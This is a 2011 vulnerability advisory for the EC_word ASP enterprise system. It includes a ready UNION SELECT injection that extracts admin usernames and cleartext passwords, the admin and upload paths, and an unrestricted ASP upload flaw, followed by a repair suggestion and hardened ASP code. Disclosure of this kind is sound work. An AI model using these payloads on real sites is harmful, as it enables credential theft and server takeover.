EC_word enterprise management system injection vulnerability and repair
Article entry: ye Gucheng, responsible editor: 2cto.com, updated on: 2011-7-9 10:49:07
This program uses the Maple Leaf universal anti-injection script, version 1.0 (ASP), which is completely ineffective against injection. The page pro_show.asp is vulnerable to cookie injection or variant injection. Before injecting, the number of fields can be determined with: ORdeR By xx
Injection statement: ANd 1 = 1 UNiOn SElEcT 1, username, 3, 4, 5, 6, 7, 8, 9, 10, password1, 12, 13, 16, 17, 18, 19, 20, 21, 24, 25 FrOm lei_admin
The password is stored in clear text, and the back-end (admin) address is admin/ind.Ex/Login.asp
Back-end upload address: admin/INc/UpFile.Htm, which allows ASP files to be uploaded directly; the upload path is admin/upimg/
Some back ends also have a double-file upload vulnerability: admin/inc/upfiletwo.asp
Some back ends also include the eWebEditor editor
From: Hongke Network Security
Repair suggested by www.2cto.com: use a different universal anti-injection script, or filter the input in pro_show.asp. The upload vulnerability must also be fixed: uploading ASP files should be prohibited.
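One way to apply this repair in Classic ASP, as an added example that is not code from EC_word or from the original article; the parameter name id, the table name product and the Application("ConnString") entry are assumptions. It reads the value from Request.QueryString only (the bare Request("id") form also falls back to Request.Cookies, which a filter that inspects only GET and POST data never sees), binds it as a typed parameter, and allowlists upload extensions.

```asp
<%@ Language="VBScript" %>
<% Option Explicit %>
<%
Const adInteger = 3, adParamInput = 1, adCmdText = 1

' Accept only a short run of digits; return -1 for anything else.
Function ParseId(raw)
    Dim re, s
    ParseId = -1
    s = raw & ""                      ' force the request item to a plain string
    Set re = New RegExp
    re.Pattern = "^[0-9]{1,9}$"       ' at most 9 digits, so CLng cannot overflow
    If re.Test(s) Then ParseId = CLng(s)
End Function

' Upload allowlist: image types only, judged on the final extension.
' The caller should save the file under a server-generated name plus this
' extension instead of reusing the client-supplied file name.
Function IsAllowedUpload(fileName)
    Dim dotPos, ext, allowed
    IsAllowedUpload = False
    dotPos = InStrRev(fileName, ".")
    If dotPos = 0 Then Exit Function
    ext = LCase(Mid(fileName, dotPos + 1))
    For Each allowed In Array("jpg", "jpeg", "gif", "png")
        If ext = allowed Then IsAllowedUpload = True
    Next
End Function

' Hardened lookup for a pro_show.asp-style page.
' Assumed names: parameter "id", table "product", Application("ConnString").
Dim id, conn, cmd, rs
id = ParseId(Request.QueryString("id"))   ' explicit collection: cookies are never consulted
If id < 0 Then
    Response.Status = "400 Bad Request"
    Response.End
End If

Set conn = Server.CreateObject("ADODB.Connection")
conn.Open Application("ConnString")
Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandType = adCmdText
cmd.CommandText = "SELECT * FROM product WHERE id = ?"
' The value is bound as an integer parameter and never concatenated into the SQL text.
cmd.Parameters.Append cmd.CreateParameter("@id", adInteger, adParamInput, , id)
Set rs = cmd.Execute
%>
```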